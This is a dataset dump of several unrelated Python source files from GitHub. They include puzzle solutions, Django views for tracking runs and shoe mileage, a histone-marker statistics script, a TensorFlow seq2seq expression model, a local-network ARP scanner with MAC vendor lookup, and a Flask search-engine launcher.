check\n # show(board)\n for i in range(n):\n for j in range(n):\n if board[m + i][m + j] != 1:\n ret = False\n\n # delete\n for i in range(m):\n for j in range(m):\n board[px + i][py + j] -= key[i][j]\n\n\n return ret\n\n\n\ndef solution(key, lock):\n\n m = len(key)\n n = len(lock)\n\n # board 가운데에 lock 할당\n board = [[0] * (2*m + n) for _ in range(2*m + n)]\n for i in range(n):\n for j in range(n):\n board[m + i][m + j] = lock[i][j]\n\n # rotate하면서 확인\n answer = False\n k = 0\n while k < 4:\n for i in range(1, m + n):\n for j in range(1, m + n):\n if check(n, m, i, j, key, board):\n answer = True\n break\n if answer:\n break\n\n if answer:\n break\n\n k += 1\n if k == 4:\n break\n key = rotate(key)\n\n return answer\n\nprint(solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]], [[1, 1, 1], [1, 1, 0], [1, 0, 1]]))","repo_name":"whiskey21/my-algorithm-book","sub_path":"카카오기출/자물쇠와열쇠.py","file_name":"자물쇠와열쇠.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32098934935","text":"#jai mata di#\nimport sys\nsys.stdin = open('input.in', 'r') \nsys.stdout = open('output.out', 'w') \n\n\n\n\n#start the code from here\nt=int(input())\nfor i in range(t):\n\tn,m=map(int,input().split())\n\tif m==2:\n\t\ttype1=list(map(int,input().split()))\n\t\tprice=list(map(int,input().split()))\n\t\ttypeperprice=[0 for i in range(m)]\n\t\tfor j in range(n):\n\t\t\ttypeperprice[type1[j]-1]+=price[j]\n\t\th=0\n\t\tif typeperprice[0]==0:\n\t\t\tprint(typeperprice[1])\n\t\t\th=1\n\t\telif typeperprice[1]==0:\n\t\t\tprint(typeperprice[0])\n\t\t\th=1\n\t\tif h==0:\n\t\t\tif typeperprice[0] weekly_total:\n weekly_total = wk_total_dist\n if wk_long_run > long_run:\n long_run = wk_long_run\n week_i += 1\n\n if weekly_total > 0:\n week['tot_change']= (((week.get('total_dist') - weekly_total)/weekly_total) *100)\n else:\n week['tot_change'] = 100\n if long_run > 0:\n week['long_change'] = (((week.get('max_dist') - long_run)/long_run) * 100)\n else:\n week['long_change'] = 100\n \n \n context.update({\n 'years': year_data,\n 'weeks': week_data,\n 'shoes': shoe_data,\n 'totals': total_data,\n #'schedules': Plan.objects.filter(end_date__gt=datetime.datetime.now())\n })\n return context\n\nclass ShoeCreateView(CreateView):\n fields = (\"name\",\"active\",\"main_shoe\")\n model = Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass ShoeListView(ListView):\n model = Shoes\n queryset = Shoes.objects.all().order_by('-id')\n\n def get_context_data(self, **kwargs):\n context = super(ShoeListView, self).get_context_data(**kwargs)\n dist = Run.objects.values('shoes').annotate(total_dist=Sum('dist')).order_by('-shoes__id')\n list = zip(self.object_list, dist)\n num_runs = Run.objects.all().count()\n total_dist = Run.objects.aggregate(Sum('dist'))\n runtime = Run.objects.aggregate(Sum('time'))\n total_time = runtime.get('time__sum')\n total_cals = Run.objects.aggregate(Sum('cals'))\n start_date = Run.objects.earliest('date')\n summary_list = [num_runs, total_dist, total_time, total_cals, start_date]\n\n context.update({\n 'shoes_list': list,\n 'total_dist': total_dist,\n 'num_runs': num_runs,\n 'total_time': total_time,\n 'total_cals': total_cals,\n 'start_date': start_date\n })\n print (context)\n return context\n\n\nclass ShoeUpdateView(UpdateView):\n fields = ('active', 'main_shoe')\n model = Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass ShoeDeleteView(DeleteView):\n model= Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass RunCreateView(CreateView):\n model = Run\n form_class = CreateRunForm\n success_url = reverse_lazy(\"run_app:run_list\")\n\n def form_valid(self, form):\n cd = form.cleaned_data\n self.object = form.save()\n date = form.cleaned_data.get('date')\n Schedule.objects.filter(date=date).update(run=Run.objects.get(date=date))\n return HttpResponseRedirect(self.get_success_url())\n\nclass RunListView(ListView):\n model = Run\n queryset = Run.objects.all().order_by('-date')\n paginate_by = 50\n\nclass RunDetailView(DetailView):\n pass\n\nclass RunUpdateView(UpdateView):\n #fields = ('date','dist', 'cals', 'time', 'location', 'shoes')\n model = Run\n success_url = reverse_lazy(\"run_app:run_list\")\n form_class=CreateRunForm\n\n\nclass RunDeleteView(DeleteView):\n model= Run\n success_url = reverse_lazy(\"run_app:run_list\")\n\nclass ScheduleView(DetailView):\n model=Plan\n\n def get_context_data(self, **kwargs):\n today = datetime.datetime.now()\n try:\n plan = Plan.objects.get(pk=self.kwargs.get('pk'))\n for day in Schedule.objects.filter(plan=plan, run=None, date__lte=datetime.datetime.today()):\n print ('updating plan', day)\n if Run.objects.filter(date=day.date).exists():\n print (day.date)\n run = Run.objects.get(date=day.date)\n day.run = run\n day.save()\n print ('updated schedule', day)\n except Exception as e:\n print ('no schedule update', e)\n \n\n\n context = super(ScheduleView, self).get_context_data(**kwargs)\n plan = Plan.objects.get(pk=self.kwargs.get('pk'))\n #today = datetime.datetime.now()\n if today < datetime.datetime.combine(plan.start_date, datetime.datetime.min.time()):\n today = datetime.datetime.combine(plan.start_date, datetime.datetime.min.time())\n \n if today <= datetime.datetime.combine(plan.end_date, datetime.datetime.min.time()):\n current_week = Schedule.objects.filter(date=today).values('week').first()\n last_week = Schedule.objects.filter(week=int(current_week.get('week'))-1).values('week').first()\n next_week = Schedule.objects.filter(week=int(current_week.get('week'))+1).values('week').first()\n print (last_week, current_week, next_week)\n\n expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=today) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n actual = Run.objects.filter(Q(date__lte=today) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n #base_expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=plan.start_date) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n #base_actual = Run.objects.filter(Q(date__lte=plan.start_date) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n \n race_expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=today) & Q(date__gte=plan.start_date) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n race_actual = Run.objects.filter(Q(date__lte=today) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n \n\n #base_plan_km = base_expected.get('dist__sum')*1.6\n #base_expected['plan_km']=base_plan_km\n #base_actual['dist_percent']= (base_actual.get('dist__sum')/base_expected.get('plan_km')) * 100\n #base_actual['run_percent']= (base_actual.get('date__count')/base_expected.get('date__count')) * 100\n\n race_plan_km = race_expected.get('dist__sum')*1.6\n race_expected['plan_km']=race_plan_km\n race_actual['dist_percent']= (race_actual.get('dist__sum')/race_expected.get('plan_km')) * 100\n race_actual['run_percent']= (race_actual.get('date__count')/race_expected.get('date__count')) * 100\n\n #plan_km = expected.get('dist__sum')*1.6\n #expected['plan_km']=plan_km\n #actual['dist_percent']= (actual.get('dist__sum')/expected.get('plan_km')) * 100\n #actual['run_percent']= (actual.get('date__count')/expected.get('date__count')) * 100\n print (actual)\n\n\n\n if plan.end_date - datetime.datetime.now().date() > datetime.timedelta(days=7):\n context.update( {\n 'plan': plan,\n 'last_week': Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[last_week.get('week')]),\n 'current_week': Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[current_week.get('week')]),\n 'next_week': Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[next_week.get('week')]),\n 'schedule': Schedule.objects.filter(plan__pk=self.kwargs.get('pk')).exclude(week__in=[last_week.get('week'), current_week.get('week'), next_week.get('week')]).order_by('date'),\n 'expected': expected,\n 'actual': actual,\n #'base_expected': base_expected,\n #'base_actual': base_actual,\n 'race_expected': race_expected,\n 'race_actual': race_actual,\n\n })\n else:\n context.update( {\n 'plan': plan,\n 'last_week': None,\n 'current_week': None,\n 'next_week': None,\n 'schedule': Schedule.objects.filter(plan__pk=self.kwargs.get('pk')).order_by('-date'),\n 'expected': expected,\n 'actual': actual,\n #'base_expected': base_expected,\n #'base_actual': base_actual,\n 'race_expected': race_expected,\n 'race_actual': race_actual,\n\n })\n\n #print (context)\n return context\n\nclass getRunKeeperData(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n \n try:\n print ('get')\n #try:\n run_data = strava.StravaData()\n run_dict = run_data.get_runs()\n\n print ('-----')\n print (run_dict, len(run_dict))\n #activities = run_dict['activities']\n for data in json.loads(run_dict):\n print ('starting 4 loop', data)\n if data['activity'] == \"Run\":\n date = data['date'].split('T')[0]\n dist = round(data['distance']/1000,2)\n time = timedelta(seconds=data['time'])\n cals = data['calories']\n #shoe = Shoes.objects.get(main_shoe=True)\n #location = 1\n\n print ('shoes', type(Shoes.objects.get(main_shoe=True)))\n\n if Run.objects.filter(date=datetime.datetime.strptime(date, '%Y-%m-%d'), dist = dist).exists():\n pass\n else:\n run = Run()\n\n run.date=datetime.datetime.strptime(date, '%Y-%m-%d')\n run.dist = dist \n run.time = time\n run.cals = cals\n \n run.shoes = Shoes.objects.get(main_shoe=True)\n run.location = 1\n\n run.save()\n\n update_plan_actual(run)\n else:\n print ('not a run: ', data)\n \n return JsonResponse(run_dict, status=200, safe=False)\n\n #return JsonResponse(json.dumps(run_dict), 200)\n\n except Exception as e:\n print ('api error', e)\n return JsonResponse({'error': str(e)}, status=200)\n\ndef update_plan_actual(run):\n #today = datetime.datetime.now()\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n for day in Schedule.objects.filter(plan=plan, run=None, date__lte=datetime.datetime.today()):\n print ('updating plan', day)\n if Run.objects.filter(date=day.date).exists():\n print (day.date)\n run = Run.objects.get(date=day.date)\n day.run = run\n day.save()\n print ('updated schedule', day)\n except Exception as e:\n print ('no schedule update', e)\n \n return\n\n\nclass GetShoeDataAPI(APIView):\n\n def get(self, num):\n data = {}\n try:\n data['shoes'] = list(Run.objects.filter(shoes__active=True).values('shoes__name').annotate(Sum('dist')))\n data['runs'] = serializers.serialize('json', Run.objects.all().order_by('-date')[:5], use_natural_foreign_keys=True)\n print (data)\n except Exception as e:\n print ('GETSHoeAPIDATAAPI issue', e)\n data = {'error': str(e)}\n\n return JsonResponse(data, status=200, safe=False)\n\n\nclass GetPlanSummaryAPI(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n data = {}\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n #plan = Plan.objects.get(pk=2)\n if datetime.datetime.combine(plan.end_date, datetime.datetime.min.time()) > datetime.datetime.today():\n max_date = datetime.date.today()\n else:\n max_date = plan.end_date\n\n print ('max: ', plan, max_date)\n total_dist = Schedule.objects.filter(plan=plan).aggregate(Sum('dist'))\n #print ('raw total dist ', total_dist)\n #epxected_to_date = Schedule.objects.filter(date__gte=plan.start_date, date__lte=max_date).aggregate(Sum('dist')) \n expected_to_date = Schedule.objects.filter(plan=plan, date__gte=plan.start_date, date__lte=max_date).aggregate(d=Coalesce(Sum('dist'), 0)) \n dist_to_date = Run.objects.filter(date__gte=plan.start_date, date__lte=plan.end_date).aggregate(d=Coalesce(Sum('dist'), 0.0))\n expected_runs = Schedule.objects.filter(plan=plan, date__gte=plan.start_date, date__lte=max_date).exclude(dist=0).count()\n total_runs = Run.objects.filter(date__gte=plan.start_date, date__lte=plan.end_date).count()\n \n data['total_dist'] = round(float(total_dist.get('dist__sum')) * 1.6, 2)\n data['dist_to_date'] = round(dist_to_date.get('d'), 2)\n data['expected_to_date'] = round(float(expected_to_date.get('d')) * 1.6, 2)\n #data['dist_percent'] = round((expected_to_date.get('d')*1.6)/dist_to_date.get('d'),2)\n data['dist_percent'] = round(dist_to_date.get('d')/(expected_to_date.get('d')*1.6),2)\n data['runs_percent'] = round(total_runs/expected_runs,2)\n data['expected_runs'] = expected_runs\n data['total_runs'] = total_runs\n\n for s in Schedule.objects.filter(plan=plan, run__isnull=True, date__lte=max_date):\n if Run.objects.filter(date=s.date).exists():\n s.run = Run.objects.get(date=s.date)\n s.save()\n except Exception as e:\n print ('GETPlanSummaryAPI issue', e)\n data = {'error': str(e)}\n print (data)\n return JsonResponse(data, status=200, safe=False)\n\n\nclass GetThisWeekPlanAPI(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n data = {}\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n today = datetime.datetime.today().date()\n mon = today - timedelta(days=today.weekday())\n sun = mon + timedelta(days=6)\n data = serializers.serialize('json', Schedule.objects.filter(date__gte=mon, date__lte=sun, plan=plan))\n\n except Exception as e:\n print ('GETPlanSummaryAPI issue', e)\n data = json.dumps({'error': str(e)})\n\n return JsonResponse(data, status=200, safe=False)\n","repo_name":"jflynn87/games","sub_path":"run_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33633351287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 13:19:24 2021\n\n@author: ronguy\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 22 20:09:58 2021\n\n@author: ronguy\n\"\"\"\nimport matplotlib.cm as cmx\nimport numpy as np\nfrom sklearn.manifold import TSNE\nfrom scipy import integrate as int\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport time\nimport shelve\nimport guidata\nimport guidata.dataset.datatypes as dt\nimport guidata.dataset.dataitems as di\nimport swat\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom time import time\nfrom bootstrap_stat import datasets as d\nfrom bootstrap_stat import bootstrap_stat as bp\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import preprocessing\nfrom sklearn import datasets\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.linear_model import LinearRegression\nimport statsmodels.stats.weightstats as ws\nfrom sklearn.cluster import KMeans\nimport guidata\nimport guidata.dataset.datatypes as dt\nimport guidata.dataset.dataitems as di\nfrom tkinter import *\nfrom tkinter.filedialog import asksaveasfilename\nimport umap\nfrom lmfit import minimize, Parameters\nfrom matplotlib import colors\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.datasets import make_blobs\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef dbscan_plot(data,eps=0.1,min_samples=50):\n X=data\n X = StandardScaler().fit_transform(X)\n db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n print(\"Silhouette Coefficient: %0.3f\"\n % metrics.silhouette_score(X, labels))\n\n # Black removed and is used for noise instead.\n plt.figure(figsize=(10, 10))\n unique_labels = set(labels)\n colors = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\n for k, col in zip(unique_labels, colors):\n if k == -1:\n # Black used for noise.\n col = [0, 0, 0, 1]\n\n class_member_mask = (labels == k)\n \n xy = X[class_member_mask & core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),label = k,\n markeredgecolor='k', markersize=14)\n \n xy = X[class_member_mask & ~core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=6)\n \n plt.legend(fontsize=15, title_fontsize='40') \n plt.title('Estimated number of clusters: %d' % n_clusters_)\n plt.show()\n return labels\n\n\n\ndef residual(params, x, data):\n alpha = params['alpha']\n beta = params['beta']\n gam = params['gamma']\n \n\n avMarkers=x['H3.3']*alpha+x['H4']*beta+x['H3']*gam\n od=x.subtract(avMarkers,axis=0)\n return np.std(od['H3.3'])+np.std(od['H4'])+np.std(od['H3'])\n #(pow(od['H3']-avMarkers,2)+pow(od['H3.3']-avMarkers,2)+pow(od['H4']-avMarkers,2))\n\n\n\n\n\n\n\ndef twoSampZ(X1, X2):\n from numpy import sqrt, abs, round\n from scipy.stats import norm\n mudiff=np.mean(X1)-np.mean(X2)\n sd1=np.std(X1)\n sd2=np.std(X2)\n n1=len(X1)\n n2=len(X2)\n pooledSE = sqrt(sd1**2/n1 + sd2**2/n2)\n z = ((X1 - X2) - mudiff)/pooledSE\n pval = 2*(1 - norm.cdf(abs(z)))\n return round(pval, 4)\n\ndef statistic(dframe):\n return dframe.corr().loc[Var1,Var2]\n\n\ndef draw_umap(data,n_neighbors=15, min_dist=0.1, n_components=2, metric='euclidean', title=''\n ,cc=0):\n fit = umap.UMAP(\n n_neighbors=n_neighbors,\n min_dist=min_dist,\n n_components=n_components,\n metric=metric\n )\n u = fit.fit_transform(data);\n plt.figure(figsize=(6, 5))\n if n_components == 2:\n plt.scatter(u[:,0], u[:,1], c=cc,s=3,cmap=plt.cm.jet)\n plt.clim(-5,5)\n plt.colorbar()\n plt.title(title, fontsize=18)\n return u;\n\n#df=pd.read_csv(\"control.csv\")\n#dfmut=pd.read_csv(\"mutant.csv\")\ndir=\"/Users/ronguy/Dropbox/Work/CyTOF/Datasets/\"\nC15=pd.read_csv(dir+\"C06.csv\")\nC16=pd.read_csv(dir+\"C08.csv\")\n\n\n#C11=C11[(C11 != 0).all(1)]\n#C12=C12[(C12 != 0).all(1)]\n\n\n\nNamesAll=['H3',\n 'H3K36me3',\n 'H2B',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3.3',\n 'H3K64ac',\n 'H4',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n 'H3K27me3',\n 'H3K27M',\n 'H3K9me3',\n 'pHistone H3 [S28]']\n\n\n\nplt.figure(figsize=(6, 5))\n\nGateColumns=['H3',\n 'H3K36me3',\n 'H2B',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3.3',\n 'H3K64ac',\n 'H4',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n 'H3K27me3',\n 'H3K27M',\n 'H3K9me3',\n 'pHistone H3 [S28]']\n\n\n \nC15=C15[(C15[['H3','H3.3','H4']]>5).all(axis=1)]\nC16=C16[(C16[['H3','H3.3','H4']]>5).all(axis=1)]\n\n\n\nC15=C15[(C15[GateColumns]>0).all(axis=1)]\nC16=C16[(C16[GateColumns]>0).all(axis=1)]\n\nC15=C15[GateColumns]\nC16=C16[GateColumns]\n\n\n\nC16_z=(C16 - C16.mean())/C16.std()\nC15_z=(C15 - C15.mean())/C15.std()\n\n\nC16_NO=C16[(C16_z<=5).all(axis=1)]\nC15_NO=C15[(C15_z<=5).all(axis=1)]\n\n\nC16=C16_NO\nC15=C15_NO\n\n\nsns.set_style({'legend.frameon':True})\n#CAll=CAll[CAll['clust'].isin([0,1])]\nd0=C15.std()/C15.mean()\nd1=C16.std()/C16.mean()\n\n\n\ndd0=np.log(d0.sort_values())\ndd1=np.log(d1.sort_values())\n\n# fig, ax = plt.subplots(figsize=(16,10), dpi= 80)\n# ax.hlines(y=dd0.index, xmin=-5, xmax=5, color='gray', alpha=0.7, \n# linewidth=1, linestyles='dashdot')\n\n# ax.scatter(y=dd0.index, x=dd0, s=50, c='blue', alpha=0.7,\n# label=\"C15\",)\n# ax.scatter(y=dd0.index, x=d1, s=50, c='green', alpha=0.7,\n# label=\"C16\",)\n# #ax.scatter(y=dd2.index, x=dd2, s=900*np.power(sz1,2), c='red', alpha=0.7,\n# # label=\"Cluster 2\",)\n# #ax.scatter(y=dd3.index, x=dd3, s=900*np.power(sz3,2), c='magenta', alpha=0.7,\n# # label=\"Cluster 3\",)\n\n\n\n# ax.vlines(x=0, ymin=0, ymax=len(dd0)-1, color='black', alpha=0.7, linewidth=2, linestyles='dotted')\n# plt.legend(fontsize=20,\n# facecolor='White', framealpha=1,frameon=True)\n\n# ax.set_title('$\\sigma$/$\\mu$', fontdict={'size':22})\n# ax.set_xlim(0, 12.5)\n\n# plt.show()\n\n\n\ndiffs=(dd1-dd0).sort_values(ascending=False) \n \nclrs = ['red' if x < 0 else 'green' for x in diffs]\n\nNMS=[\n 'H3K36me3',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3K64ac',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n# 'H3K27me3',\n 'H3K9me3',\n# 'pHistone H3 [S28]'\n ]\n\ndiffs=diffs[NMS]\ndiffs=diffs.sort_values(ascending=False) \nclrs = ['red' if x < 0 else 'green' for x in diffs]\n\n# Draw plot\nfig, ax = plt.subplots(figsize=(16,10), dpi= 80)\nplt.hlines(y=diffs.index, xmin=0, xmax=diffs, color=clrs, alpha=0.4, linewidth=5)\n\n# Decorations\nplt.gca().set(ylabel='$Marker$', xlabel='$Difference$')\n#plt.yticks(df.index, df.cars, fontsize=12)\nplt.title('$log(\\sigma/\\mu)$ Mutant - WT', fontdict={'size':20})\nplt.grid(linestyle='--', alpha=0.5)\nplt.show()\n\n\n\n\n\ndd0=np.log(d0[NMS].sort_values())\ndd1=np.log(d1[NMS].sort_values())\n\njet = cm = plt.get_cmap('jet') \ncNorm = colors.Normalize(vmin=0, vmax=len(dd0))\nscalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet)\nprint(scalarMap.get_clim())\n\n\n\n\n\nfig, ax = plt.subplots(figsize=(16,10), dpi= 80)\nax.hlines(y=[0,1], xmin=0, xmax=6, color='gray', alpha=0.7, \n linewidth=1, linestyles='dashdot')\nfor count, value in enumerate(dd0.index):\n print(count)\n colorVal = scalarMap.to_rgba(count)\n ax.scatter(y=1, x=dd0[NMS][value], s=50, color=colorVal, alpha=0.7,label=value)\n ax.scatter(y=0, x=dd1[value], s=50, color=colorVal, alpha=0.7)\n ax.plot([dd0[value],dd1[value]],[1,0],color=colorVal,linewidth=2)\n\nax.set_xlim(-1.5,0)\nplt.yticks([0,1], ['C16','C15'], rotation='horizontal') \nplt.legend()\nplt.title('$log(\\sigma/\\mu)$')\n\nC15=C15.assign(type='WT'); \nC16=C16.assign(type='Mutant');\nCAll=C15.append(C16)","repo_name":"ronguy-huji/CyTOF-K27M","sub_path":"C15_C16_Variances copy.py","file_name":"C15_C16_Variances copy.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42742132576","text":"import tensorflow as tf\nimport time\nimport numpy as np\nimport expression_generator\nimport os\n\nepochs = 10000\nbatch_size = 128\nlearning_rate = 1e-3\n\ntf.reset_default_graph()\nsess = tf.InteractiveSession()\n\nnodes = 128\nembed_size = 20\nvocab_size = expression_generator.vocab_size\n\ninput_length = 4\noutput_length = 3\n\ninputs = tf.placeholder(tf.int32, (None, input_length), name = 'inputs')\noutputs = tf.placeholder(tf.int32, (None, None), name = 'output')\ntargets = tf.placeholder(tf.int32, (None, None), name = 'targets')\n\nwith tf.variable_scope(\"embeding\"):\n input_embedding = tf.Variable(tf.random_uniform((vocab_size, embed_size), -1.0, 1.0), name='encoder_embedding')\n output_embedding = tf.Variable(tf.random_uniform((vocab_size, embed_size), -1.0, 1.0), name='decoder_embedding')\n input_embed = tf.nn.embedding_lookup(input_embedding, inputs)\n output_embed = tf.nn.embedding_lookup(output_embedding, outputs)\n\nwith tf.variable_scope(\"encoder\"):\n encoder = tf.contrib.rnn.BasicLSTMCell(nodes)\n _, last_state = tf.nn.dynamic_rnn(encoder, inputs=input_embed, dtype=tf.float32)\n\nwith tf.variable_scope(\"decoder\"):\n decoder = tf.contrib.rnn.LSTMCell(nodes)\n dec_outputs, _ = tf.nn.dynamic_rnn(decoder, inputs=output_embed, initial_state=last_state)\n logits = tf.contrib.layers.fully_connected(dec_outputs, num_outputs=vocab_size, activation_fn=None)\n\nwith tf.variable_scope(\"loss\"):\n loss = tf.contrib.seq2seq.sequence_loss(logits, targets, tf.ones([batch_size, output_length]))\n optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(loss)\n\n\nsaver = tf.train.Saver()\nsess.run(tf.global_variables_initializer())\n\nwriter = tf.summary.FileWriter(\"output\", sess.graph)\n\nstep = epochs\ncheckpoint = tf.train.get_checkpoint_state(\"model\")\nif checkpoint and checkpoint.model_checkpoint_path:\n s = saver.restore(sess,checkpoint.model_checkpoint_path)\n print(\"Loaded model:\", checkpoint.model_checkpoint_path)\n step = int(os.path.basename(checkpoint.model_checkpoint_path).split('-')[1])\nelse:\n print(\"Can't find model\")\n\n\n try:\n start_time = time.time()\n for i in range(epochs+1):\n epoch_start_time = time.time()\n batch_x, batch_y = expression_generator.get_data(batch_size)\n _, batch_loss, batch_logits = sess.run([optimizer, loss, logits],\n feed_dict ={\n inputs: batch_x,\n outputs: [[expression_generator.EOS] + sequence for sequence in batch_y],\n targets: [sequence + [expression_generator.EOS] for sequence in batch_y]\n })\n\n if i % 100 == 0:\n print('Epoch: ' + str(i) + \", Loss: \" + str(batch_loss) + \", Epoch duration: \" + str(time.time() - epoch_start_time) + \", Total time: \" + str(time.time() - start_time))\n saver.save(sess, \"./model/model.ckpt\", global_step=i)\n except KeyboardInterrupt:\n print('training interrupted')\n\n#TEST\n\nNUM_TEST = 1000\nsuccess = 0\nfail = 0\n\nfor _ in range(NUM_TEST):\n x, y = expression_generator.get_data(1)\n decoder_input = np.zeros((len(x), 1)) + expression_generator.START_TOKEN\n result = []\n for i in range(3):\n batch_logits = sess.run(logits,\n feed_dict={inputs: x,\n outputs: decoder_input})\n prediction = batch_logits[:, -1].argmax(axis=-1)\n result.append(prediction.tolist())\n decoder_input = np.hstack([decoder_input, prediction[:, None]])\n\n y = expression_generator.array2expression(y)\n result = expression_generator.array2expression(result)\n try:\n if int(result) == int(y):\n success += 1\n else:\n fail += 1\n print(\"_______________\")\n print(\"X\")\n print(expression_generator.array2expression(x))\n print(\"Y\")\n print(y)\n print(\"Pred\")\n\n print(result)\n except:\n fail += 1\n print(result)\n\nprint(str(success/NUM_TEST * 100) + \"% success rate\")\n\n#VISUAL TESTS\nfor _ in range(10):\n print(\"_______________\")\n\n x, y = expression_generator.get_data(1)\n\n print(x)\n\n print(\"X\")\n print(expression_generator.array2expression(x))\n\n decoder_input = np.zeros((len(x), 1)) + expression_generator.START_TOKEN\n result = []\n for i in range(3):\n batch_logits = sess.run(logits,\n feed_dict={inputs: x,\n outputs: decoder_input\n })\n prediction = batch_logits[:, -1].argmax(axis=-1)\n result.append(prediction.tolist())\n print(\"Prediction: \" + str(prediction))\n decoder_input = np.hstack([decoder_input, prediction[:, None]])\n\n y = expression_generator.array2expression(y)\n result = expression_generator.array2expression(result)\n\n\n print(\"Y\")\n print(y)\n print(\"Pred\")\n\n print(result)\n\nwriter.close()\n\n","repo_name":"ThierryJudge/MathExpressionRNN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13021258629","text":"from scapy.all import ARP, Ether, srp\nimport requests\n\ndef scan_network(ip):\n arp = ARP(pdst=ip)\n ether = Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n packet = ether/arp\n result = srp(packet, timeout=3, verbose=0)[0]\n devices = []\n for sent, received in result:\n vendor = get_vendor(received.hwsrc)\n devices.append({'ip': received.psrc, 'mac': received.hwsrc, 'vendor': vendor})\n return devices\n\ndef get_vendor(mac_address):\n url = f\"https://api.macvendors.com/{mac_address}\"\n response = requests.get(url)\n if response.status_code != 200:\n return \"N/A\"\n return response.content.decode()\n\ndevices = scan_network('192.168.1.0/24')\nfor device in devices:\n print(f\"IP: {device['ip']} MAC: {device['mac']} Vendor: {device['vendor']}\")\n","repo_name":"FreddyOjeda/proyecto_de_grado","sub_path":"bing_2.py","file_name":"bing_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24560070058","text":"from app.routes import add_routes\nfrom app.search_engine import Search_engine\nfrom app import app\nimport configparser\nimport argparse\nimport nltk\n\nif __name__ == '__main__':\n\n try:\n print('## Baixando pacotes extras...')\n nltk.download('punkt')\n nltk.download('stopwords')\n nltk.download('rslp')\n print('## Pronto...\\n')\n except:\n print('## Erro ao baixar os pacotes!\\n')\n exit(0)\n\n print('## Aplicando configurações e instanciando ferramentas...')\n\n # Caminho da base de dados\n base_dir = '/app/base_de_dados/'\n # Tratamentos a serem aplicados no corpus\n tratement = ['alpha_num', 'lower_case', 'stop_words', 'steamming']\n\n\n print('## Instanciando a engine...')\n search_engine = Search_engine(base_dir, tratement)\n print('## Iniciando processamento da base de dados. Isso pode demorar um pouco...')\n search_engine.proccess_database()\n\n print('## Subindo api...')\n app = app\n add_routes(app, search_engine)\n config = configparser.ConfigParser()\n config.read('config/configuration.cfg')\n app.run(\n host=config.get('general', 'host',fallback='0.0.0.0'),\n port=config.get('general', 'port',fallback='8000'),\n debug=False\n 